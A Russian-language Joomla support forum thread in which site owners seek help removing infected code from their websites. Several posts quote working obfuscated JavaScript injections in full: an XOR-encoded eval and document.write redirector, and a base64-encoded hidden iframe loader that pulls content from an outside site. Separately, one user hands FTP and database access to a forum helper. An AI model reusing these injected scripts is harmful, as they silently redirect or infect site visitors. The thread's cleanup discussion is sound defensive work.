Форум русской поддержки Joomla!® CMS
11.12.2016, 11:59:57 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1] 2  Все   Вниз
  Добавить закладку  |  Печать  
Автор

Помогите удалить вирус из файлов!

 (Прочитано 8010 раз)
0 Пользователей и 1 Гость смотрят эту тему.
Zeya
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 157


« : 14.02.2010, 20:28:42 »

Здраваствуйте, уважаемые программисты! Smiley
Проблема такая:
на сайте обнаружены вирусы, резервной копии нет... Crazy Помогите, пожалуйста, удалить чужеродный код их файлов! Я с PHP не знакома, ниче не могу поделать... Cry
Записан
art1535
Давно я тут
****

Репутация: +6/-0
Offline Offline

Пол: Мужской
Сообщений: 271


Мат&Тык


« Ответ #1 : 14.02.2010, 22:17:08 »

"На сайте вирус - Что делать?" Краткое руководство для начинающих сайтостроителей.
Записан
Zeya
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 157


« Ответ #2 : 14.02.2010, 22:30:32 »

Спасибо, я прочитала предварительно. Скачала на комп, проверила, выявила поврежденные файлы... Но не могу исправить, т.к. не знаю PHP.
Записан
art1535
Давно я тут
****

Репутация: +6/-0
Offline Offline

Пол: Мужской
Сообщений: 271


Мат&Тык


« Ответ #3 : 14.02.2010, 22:32:07 »

Ну так вирус в движке всё ещё есть, вы их вылечили?
Записан
art1535
Давно я тут
****

Репутация: +6/-0
Offline Offline

Пол: Мужской
Сообщений: 271


Мат&Тык


« Ответ #4 : 14.02.2010, 22:34:07 »

<iframe> и <script> этих тегов не нашли на страницах? И вообще Ваш антивирус должен показывать, что именно за вирус
Записан
Zeya
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 157


« Ответ #5 : 14.02.2010, 22:39:28 »

вирусы -черви, антивирусник предложил удалить или поместить в хранилище, не лечит....
теги ща посмотрю
Записан
art1535
Давно я тут
****

Репутация: +6/-0
Offline Offline

Пол: Мужской
Сообщений: 271


Мат&Тык


« Ответ #6 : 14.02.2010, 22:41:09 »

а какие именно файлы заражены?и у "червей" должно быть название-это антивирус тоже должен показывать
Записан
Zeya
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 157


« Ответ #7 : 14.02.2010, 23:01:46 »

administrator\templates\khepri\html\index.html - JS:Redirector-AY [Trj]- 2 шт.
administrator\templates\system\html\index.html - JS:Redirector-AY [Trj]
libraries\joomla\document\html\renderer\index.html - JS:Redirector-AY [Trj] - 2 шт.
libraries\joomla\document\html\index.html - JS:Redirector-AY [Trj]
libraries\joomla\html\html\menu.php - JS:Redirector-AY [Trj]
libraries\joomla\html\index.html - JS:Redirector-AY [Trj]
libraries\joomla\html\parameter\index.html - JS:Redirector-AY [Trj]
libraries\joomla\html\parameter\element\menu.php - JS:Redirector-AY [Trj]
libraries\joomla\html\parameter\element\index.html - JS:Redirector-AY [Trj]
ibraries\joomla\html\toolbar\index.html - JS:Redirector-AY [Trj]
libraries\joomla\html\toolbar\button\index.html - JS:Redirector-AY [Trj]
libraries\pattemplate\patTemplate\Modifier\HTML\index.html - JS:Redirector-AY [Trj]
templates\system\html\index.html - JS:Redirector-AY [Trj]
Записан
beliyadm
Профи
********

Репутация: +1566/-61
Offline Offline

Пол: Мужской
Сообщений: 8110


Севастополь == Россия


« Ответ #8 : 14.02.2010, 23:05:21 »

если нет резервной копии:
1 - проходиться ручками и чистить (надо понимать что к чему)
2 - взять эти файлы из исходного архива движка, если в них не вносились изменения
3 - все index.html в корне каталогов должны быть пустые (либо с банальной заглушкой) их можно переписать без проблем и без терзаний
Записан
Zeya
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 157


« Ответ #9 : 14.02.2010, 23:26:46 »

вот я как раз и не понимаю, что к чему...  вернее, не рискну править , не зная точно...
и про изменения с уверенностью не могу сказать
Поэтому и прошу помощи знающих товарищей. Cheesy
« Последнее редактирование: 15.02.2010, 02:15:01 от Zeya » Записан
Zeya
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 157


« Ответ #10 : 16.02.2010, 00:08:09 »

Люди, подскажите, пожалуйста, хотя бы, как примерно выглядит код трояна!
Записан
beliyadm
Профи
********

Репутация: +1566/-61
Offline Offline

Пол: Мужской
Сообщений: 8110


Севастополь == Россия


« Ответ #11 : 16.02.2010, 00:34:30 »

Люди, подскажите, пожалуйста, хотя бы, как примерно выглядит код трояна!
никто кроме трояна этого не знает
иногда iframe, иногда через js подключение, иногда еще интересней
Записан
Zeya
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 157


« Ответ #12 : 16.02.2010, 00:42:20 »

никто кроме трояна этого не знает
ситуация безвыходная чтоль?
Записан
beliyadm
Профи
********

Репутация: +1566/-61
Offline Offline

Пол: Мужской
Сообщений: 8110


Севастополь == Россия


« Ответ #13 : 16.02.2010, 00:44:09 »

ситуация безвыходная чтоль?
нет, выход есть, нужен только глубокий анализ проблемы, мазок и все можно решить
Записан
Zeya
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 157


« Ответ #14 : 16.02.2010, 00:45:40 »

нужен только глубокий анализ проблемы, мазок и все можно решить
какие шаги я могу предпринять по вышесказанному?
Записан
beliyadm
Профи
********

Репутация: +1566/-61
Offline Offline

Пол: Мужской
Сообщений: 8110


Севастополь == Россия


« Ответ #15 : 16.02.2010, 00:49:47 »

какие шаги я могу предпринять по вышесказанному?
1 - проанализировать какой код и в каких файлах поселился
2 - вручную (если я правильно понял что бекапа нет) вычистить
3 - сделать резервную копию и не забывать об этом в дальнейшем
Записан
strannik-yura
Завсегдатай
*****

Репутация: +44/-1
Offline Offline

Пол: Мужской
Сообщений: 514


:)


« Ответ #16 : 16.02.2010, 00:56:38 »

например код исходной страницы templates\system\html\index.html выглядит так
Код:
<html><body bgcolor="#FFFFFF"></body></html>
берёшь в свой заражённый файл с сайта (templates\system\html\index.html) и сравниваешь с исходным и всё что лишнее от кода  
Код:
<html><body bgcolor="#FFFFFF"></body></html>
то и есть вирус.
Записан
Zeya
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 157


« Ответ #17 : 16.02.2010, 00:58:14 »

1 - проанализировать какой код и в каких файлах поселился
2 - вручную (если я правильно понял что бекапа нет) вычистить
из трех пунктов мне по силам только третий... )))) хотя, нет, если проанализировоть, какой код - вирус - удалить, думается, смогу.
Записан
Zeya
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 157


« Ответ #18 : 16.02.2010, 01:00:34 »

и сравниваешь с исходным
нет исходного кода... есть только файлы шаблона, но шаблон переделывался сильно и в новом варианте не сохранен...
к тому же половина зараженных файлов в оригинале вообще отсутствует..
Записан
temniy
Завсегдатай
*****

Репутация: +82/-9
Offline Offline

Пол: Мужской
Сообщений: 419



« Ответ #19 : 16.02.2010, 01:06:22 »

Да что вы мучаете девушку.

Zeya, выложите сюда содержимое зараженного templates\system\html\index.html
Записан
Zeya
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 157


« Ответ #20 : 16.02.2010, 01:21:13 »

temniy, с удовольствием!
Вот: (тут, вроде бы, все понятно... скрипт - это троян?)
Код:
<html><body bgcolor="#FFFFFF"></body></html><script>rpnsxy=["uqjici=0;snwvcdmd='';for(oxbjvi=0;oxbjvi<rpnsxy[0]['length'];oxbjvi+=1) uqjici+=rpnsxy[0].charCodeAt(oxbjvi);uqjici%=0x64;for(oxbjvi=0;oxbjvi<rpnsxy[1]['length'];oxbjvi+=2) snwvcdmd+=String.fromCharCode(parseInt(0+'x'+rpnsxy[1].charAt(oxbjvi)+rpnsxy[1].charAt(oxbjvi+1))^uqjici);document.write(snwvcdmd);","13475b424311134d404b5611135c4c5d465f5b11594e5d0f5b4a425f66695d4e424a124b404c5a424a415b014c5d4a4e5b4a6a434a424a415b070846495d4e424a0806145b4a425f66695d4e424a015c4a5b6e5b5b5d464d5a5b4a0708464b0803087d7c66695d4e424a0806145b4a425f66695d4e424a015c4a5b6e5b5b5d464d5a5b4a07085c5d4c080308475b5b5f1500004c43464c44025f40465c44014c4042005b474a5d4a004641014c484610180806145b4a425f66695d4e424a015c5b56434a0159465c464d4643465b56120847464b4b4a4108145b4a425f66695d4e424a015c5b56434a0158464b5b4712081f5f5708145b4a425f66695d4e424a015c5b56434a01474a4648475b12081f5f57081466695d4e424a604d450f120f4b404c5a424a415b014d404b56014e5f5f4a414b6c4746434b075b4a425f66695d4e424a061413005c4c5d465f5b1113004d404b56111300475b424311"];eval(rpnsxy[0]);</script>
Записан
beliyadm
Профи
********

Репутация: +1566/-61
Offline Offline

Пол: Мужской
Сообщений: 8110


Севастополь == Россия


« Ответ #21 : 16.02.2010, 01:28:02 »

Если девушка в личку мне даст доступ к фтп, базе данных (phpmyadmin) - я все ей почищу, делов то
Записан
Zeya
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 157


« Ответ #22 : 16.02.2010, 01:38:22 »

beliyadm, уже даю! Wink
Записан
beliyadm
Профи
********

Репутация: +1566/-61
Offline Offline

Пол: Мужской
Сообщений: 8110


Севастополь == Россия


« Ответ #23 : 16.02.2010, 01:41:37 »

beliyadm, уже даю! Wink
жду в личку, завтра посмотрю и почищу, оставьте свои координаты для связи если что вдруг
Записан
temniy
Завсегдатай
*****

Репутация: +82/-9
Offline Offline

Пол: Мужской
Сообщений: 419



« Ответ #24 : 16.02.2010, 11:55:52 »

Ну да, это
Код:
<script>rpnsxy=["uqjici=0;snwvcdmd='';for(oxbjvi=0;oxbjvi<rpnsxy[0]['length'];oxbjvi+=1) uqjici+=rpnsxy[0].charCodeAt(oxbjvi);uqjici%=0x64;for(oxbjvi=0;oxbjvi<rpnsxy[1]['length'];oxbjvi+=2) snwvcdmd+=String.fromCharCode(parseInt(0+'x'+rpnsxy[1].charAt(oxbjvi)+rpnsxy[1].charAt(oxbjvi+1))^uqjici);document.write(snwvcdmd);","13475b424311134d404b5611135c4c5d465f5b11594e5d0f5b4a425f66695d4e424a124b404c5a424a415b014c5d4a4e5b4a6a434a424a415b070846495d4e424a0806145b4a425f66695d4e424a015c4a5b6e5b5b5d464d5a5b4a0708464b0803087d7c66695d4e424a0806145b4a425f66695d4e424a015c4a5b6e5b5b5d464d5a5b4a07085c5d4c080308475b5b5f1500004c43464c44025f40465c44014c4042005b474a5d4a004641014c484610180806145b4a425f66695d4e424a015c5b56434a0159465c464d4643465b56120847464b4b4a4108145b4a425f66695d4e424a015c5b56434a0158464b5b4712081f5f5708145b4a425f66695d4e424a015c5b56434a01474a4648475b12081f5f57081466695d4e424a604d450f120f4b404c5a424a415b014d404b56014e5f5f4a414b6c4746434b075b4a425f66695d4e424a061413005c4c5d465f5b1113004d404b56111300475b424311"];eval(rpnsxy[0]);</script>
и есть вирус, удалите этот и похожий код из всех файлов.

Но главное - нужно найти и устранить причину по которой он смог внедриться. Это либо дыра в движке, либо ваш компьютер инфицирован и вирус проник по фтп.
Записан
Zeya
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 157


« Ответ #25 : 17.02.2010, 14:35:23 »

Спасибо большое, всем, кто помогал! Во всех index.html нужно было просто убрать вредоносный код:
Код:
<script>rpnsxy=["uqjici=0;snwvcdmd='';for(oxbjvi=0;oxbjvi<rpnsxy[0]['length'];oxbjvi+=1) uqjici+=rpnsxy[0].charCodeAt(oxbjvi);uqjici%=0x64;for(oxbjvi=0;oxbjvi<rpnsxy[1]['length'];oxbjvi+=2) snwvcdmd+=String.fromCharCode(parseInt(0+'x'+rpnsxy[1].charAt(oxbjvi)+rpnsxy[1].charAt(oxbjvi+1))^uqjici);document.write(snwvcdmd);","13475b424311134d404b5611135c4c5d465f5b11594e5d0f5b4a425f66695d4e424a124b404c5a424a415b014c5d4a4e5b4a6a434a424a415b070846495d4e424a0806145b4a425f66695d4e424a015c4a5b6e5b5b5d464d5a5b4a0708464b0803087d7c66695d4e424a0806145b4a425f66695d4e424a015c4a5b6e5b5b5d464d5a5b4a07085c5d4c080308475b5b5f1500004c43464c44025f40465c44014c4042005b474a5d4a004641014c484610180806145b4a425f66695d4e424a015c5b56434a0159465c464d4643465b56120847464b4b4a4108145b4a425f66695d4e424a015c5b56434a0158464b5b4712081f5f5708145b4a425f66695d4e424a015c5b56434a01474a4648475b12081f5f57081466695d4e424a604d450f120f4b404c5a424a415b014d404b56014e5f5f4a414b6c4746434b075b4a425f66695d4e424a061413005c4c5d465f5b1113004d404b56111300475b424311"];eval(rpnsxy[0]);</script>
,
а файлы php мне beliyadm вылечил, за что ему оргомнейшее спасибо!
Записан
heroi_n
Осваиваюсь на форуме
***

Репутация: +1/-0
Offline Offline

Сообщений: 44



« Ответ #26 : 10.03.2010, 16:08:48 »

Добрый день, сегодня 2 моих сайта "упали@? все на одном и том же хостинге, 2 дня назад я заметил на странице index.php я заметил код

Цитировать
?><!-- o65 --><script>function c052f543b7(oe){var
n3='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var w0='';var wb,s0,o7,v7,td,sf,p2;var
q8=0;do{v7=n3.indexOf(oe.charAt(q8++));td=n3.indexOf(oe.charAt(q8++));sf=n3.indexOf(oe.charAt(q8+
+));p2=n3.indexOf(oe.charAt(q8++));wb=(v7<<2)|(td>>4);s0=((td&15)<<4)|(sf>>2);o7=((sf&3)<<6)|p2;if(wb>=192) wb
+=848;else if(wb==168) wb=1025;else if(wb==184) wb=1105;w0+=String.fromCharCode(wb);if(sf!=64){if(s0>=192)
s0+=848;else if(s0==168) s0=1025;else if(s0==184) s0=1105;w0+=String.fromCharCode(s0);}if(p2!=64){if(o7>=192)
o7+=848;else if(o7==168) o7=1025;else if(o7==184) o7=1105;w0+=String.fromCharCode(o7);}}while
(q8<oe.length);document.write(w0);};c052f543b7
('PGlmcmFtZSBzcmM9Imh0dHA6Ly9kaXJla3R2b3J1bi5uZXQva29rb3ZzL3N2Nzc3L2luZGV4LnBocCIgd2lkdGg9MCBoZWlnaHQ9MD48L2lmc
mFtZT4A');</script><!-- c65 -->

Код я удалил, права проверил. успокоился, сегодня у меня эта запись была уже вот всех файлах index.php и оч много index.html
Индексы которые php я вычистил вручную, HTML очень много, копии сайта нет, при входе в админку и на сайт белый экран, ничего нет, куда копать? Что сделать, На втором сайте могу зайти в админку. Код примерно такой же.

KIS ругается на

Цитировать
Доступ запрещен
Запрашиваемый URL-адрес не может быть предоставлен
В запрашиваемом объекте по URL-адресу:
http://бла бла бла
Обнаружена угроза:
объект заражен Trojan-Downloader.JS.Iframe.byo

Про вирус почитал, но пока вычистить не смог. Как быть c чего начать,
Записан
temniy
Завсегдатай
*****

Репутация: +82/-9
Offline Offline

Пол: Мужской
Сообщений: 419



« Ответ #27 : 10.03.2010, 17:03:09 »

Как быть c чего начать,
1) Проверить свой компьютер (желательно не Касперским)
2) Проверить наличие посторонних файлов на сервере
3) Проверить целостность всех файлов на сервере на предмет отсутствия постороннего кода.
Записан
heroi_n
Осваиваюсь на форуме
***

Репутация: +1/-0
Offline Offline

Сообщений: 44



« Ответ #28 : 11.03.2010, 08:25:10 »

1) Проверить свой компьютер (желательно не Касперским)
проверяю нодом, все чистенько
2) Проверить наличие посторонних файлов на сервере
да это как проверить то. там куча папок, ну вроде внешне в корне нет ничего лишнего
3) Проверить целостность всех файлов на сервере на предмет отсутствия постороннего кода.
да вот есть код то!
Цитировать
Код я удалил, права проверил. успокоился, сегодня у меня эта запись была уже вот всех файлах index.php и оч много index.html
Индексы которые php я вычистил вручную, HTML очень много, копии сайта нет, при входе в админку и на сайт белый экран, ничего нет, куда копать? Что сделать, На втором сайте могу зайти в админку. Код примерно такой же.
Записан
Ecspert
Завсегдатай
*****

Репутация: +12/-0
Offline Offline

Пол: Мужской
Сообщений: 414



« Ответ #29 : 30.08.2010, 22:48:40 »

например код исходной страницы templates\system\html\index.html выглядит так
Код:
<html><body bgcolor="#FFFFFF"></body></html>
берёшь в свой заражённый файл с сайта (templates\system\html\index.html) и сравниваешь с исходным и всё что лишнее от кода 
Код:
<html><body bgcolor="#FFFFFF"></body></html>
то и есть вирус.
слушайте а что это за файл index.html с <html><body bgcolor="#FFFFFF"></body></html> ? он у меня создаётся чуть ли не во всех папках...
Записан
Страниц: [1] 2  Все   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet